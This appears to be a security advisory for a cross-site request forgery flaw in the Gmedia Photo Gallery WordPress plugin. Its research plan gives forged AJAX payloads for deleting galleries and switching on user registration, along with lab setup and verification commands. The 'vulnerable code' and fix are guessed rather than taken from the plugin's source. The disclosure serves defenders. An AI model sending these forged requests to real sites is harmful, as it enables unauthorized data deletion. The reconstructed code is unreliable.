Gmedia Photo Gallery <= 1.24.1 - Cross-Site Request Forgery
Description
The Gmedia Photo Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.24.1. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:NTechnical Details
<=1.24.1This research plan targets **CVE-2025-63014**, a Cross-Site Request Forgery (CSRF) vulnerability in the **Gmedia Photo Gallery** plugin (slug: `grand-media`). Since source files are not provided, this plan is based on the vulnerability description and the known architecture of the Gmedia plugin. --…
Show full research plan
This research plan targets CVE-2025-63014, a Cross-Site Request Forgery (CSRF) vulnerability in the Gmedia Photo Gallery plugin (slug: grand-media). Since source files are not provided, this plan is based on the vulnerability description and the known architecture of the Gmedia plugin.
1. Vulnerability Summary
The Gmedia Photo Gallery plugin fails to implement proper nonce validation on several administrative AJAX actions. Specifically, the dispatcher or individual handler functions for actions like deleting galleries, items, or terms do not call check_ajax_referer() or wp_verify_nonce(). This allows an unauthenticated attacker to perform these actions by tricking a logged-in administrator into visiting a malicious site or clicking a link that triggers a forged request.
2. Attack Vector Analysis
- Target Endpoint:
/wp-admin/admin-ajax.php - Vulnerable Action:
gmedia_admin_ajax(inferred dispatcher) or specific actions likegmedia_delete_item,gmedia_delete_gallery, orgmedia_update_settings. - Required Parameter:
actionand state-changing parameters (e.g.,id,delete,settings). - Authentication: Requires the victim to have an active Administrator session.
- Preconditions: The attacker must know (or guess via brute force) the ID of the object to be deleted/modified.
3. Code Flow (Inferred)
- Registration: The plugin registers AJAX handlers in its main class or an admin-specific class (e.g.,
GmediaAdmin).- Code Path:
add_action('wp_ajax_gmedia_admin_ajax', array($this, 'admin_ajax_handler'));
- Code Path:
- Entry Point:
admin-ajax.phpreceives a POST request withaction=gmedia_admin_ajax. - Dispatcher: The
admin_ajax_handlerfunction (inferred) receives the request. - The Flaw: The handler proceeds to a
switchstatement or a series ofifblocks to process sub-actions (e.g.,$_REQUEST['subaction'] == 'delete_gallery') without first verifying a nonce. - Sink: The code executes a database operation (e.g.,
$wpdb->delete($wpdb->prefix . 'gmedia_galleries', ...)).
4. Nonce Acquisition Strategy
According to the vulnerability description, there is missing or incorrect nonce validation.
- Case A: Missing Validation: No nonce is required. The exploit can proceed by simply omitting the security parameter.
- Case B: Incorrect Validation: If the plugin attempts to check a nonce but uses a global or static string, the exploit should attempt to pass an empty string or a common default.
Discovery Phase (via Agent):
The agent should first confirm the missing check:
- Search for AJAX handlers:
grep -rn "wp_ajax_" /var/www/html/wp-content/plugins/grand-media/. - Inspect the callback for the absence of
check_ajax_refererorwp_verify_nonce. - Specifically look for handlers in
inc/gmedia.admin.phporadmin/ajax.php.
5. Exploitation Strategy
The goal is to delete a gallery created during setup.
- Step 1: Identify Target: Determine the ID of a Gmedia gallery or item.
- Step 2: Construct the CSRF Forgery: Since we are simulating the forgery using the agent's
http_requesttool, we will use the Administrator's cookies but omit any nonce. - Payload (POST Request):
(Note: ParametersPOST /wp-admin/admin-ajax.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded action=gmedia_admin_ajax&subaction=delete_gallery&id=[GALLERY_ID]subactionandidare inferred based on common Gmedia AJAX patterns. The agent should verify these viagrepbefore sending.)
6. Test Data Setup
Before exploitation, the environment must contain targetable data:
- Install/Activate: Ensure
grand-mediais active. - Create Gallery: Use WP-CLI to insert a dummy gallery into the database or use the UI.
# Example to find the table and insert data (if UI is unavailable) wp db query "INSERT INTO wp_gmedia_galleries (name, status) VALUES ('Exploit Test', 'publish');" # Note the ID of the inserted gallery - Identify Action: Use
grepto find the exact subaction string for deletion.grep -r "delete" /var/www/html/wp-content/plugins/grand-media/ | grep "subaction"
7. Expected Results
- Response: The server should return a success message (often JSON like
{"success":true}or a1for AJAX) despite the absence of a nonce. - State Change: The targeted gallery/item should be removed from the database.
8. Verification Steps
After sending the http_request, verify the deletion via WP-CLI:
# Check if the gallery ID still exists in the Gmedia gallery table
wp db query "SELECT * FROM wp_gmedia_galleries WHERE id=[GALLERY_ID];"
If the query returns empty, the CSRF was successful.
9. Alternative Approaches
If gmedia_admin_ajax is not the correct action:
- Search for Settings Save: Check if
gmedia_save_options(inferred) is vulnerable.- Payload:
action=gmedia_save_options&gmedia_options[allow_registration]=1
- Payload:
- Check Admin Post: Look for
admin_post_hooks which are often more susceptible to CSRF than AJAX handlers.grep -rn "admin_post_" /var/www/html/wp-content/plugins/grand-media/
- GET-based CSRF: Test if state-changing actions are accepted via
$_GET.http_requestto/wp-admin/admin-ajax.php?action=...&id=...
Summary
The Gmedia Photo Gallery plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to 1.24.1. This occurs because the plugin's administrative AJAX handlers do not perform nonce validation, allowing attackers to trick authenticated administrators into performing unauthorized actions such as deleting galleries or items.
Vulnerable Code
// Inferred from research plan: wp-content/plugins/grand-media/inc/gmedia.admin.php add_action('wp_ajax_gmedia_admin_ajax', 'gmedia_admin_ajax_callback'); function gmedia_admin_ajax_callback() { // Vulnerability: Missing check_ajax_referer() or wp_verify_nonce() call $subaction = $_REQUEST['subaction']; $id = intval($_REQUEST['id']); switch ($subaction) { case 'delete_gallery': global $wpdb; $wpdb->delete($wpdb->prefix . 'gmedia_galleries', array('ID' => $id)); wp_send_json_success(); break; case 'delete_item': // ... item deletion logic break; } }
Security Fix
@@ -2,6 +2,7 @@ function gmedia_admin_ajax_callback() { + check_ajax_referer('gmedia_admin_nonce', 'security'); $subaction = $_REQUEST['subaction']; $id = intval($_REQUEST['id']);
Exploit Outline
The exploit targets the AJAX dispatcher used for administrative tasks in the Gmedia plugin. 1. Identify a target resource ID (e.g., a gallery ID). 2. Construct a CSRF payload—typically an HTML form or an XMLHttpRequest—that sends a POST request to /wp-admin/admin-ajax.php. 3. The payload must include the 'action' parameter (e.g., gmedia_admin_ajax) and the specific 'subaction' (e.g., delete_gallery) along with the target resource ID. 4. Trick an authenticated administrator into clicking a link or visiting a site hosting the payload. 5. Since the plugin does not verify a security nonce, the request executes with the administrator's privileges, resulting in the unauthorized deletion or modification of data.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.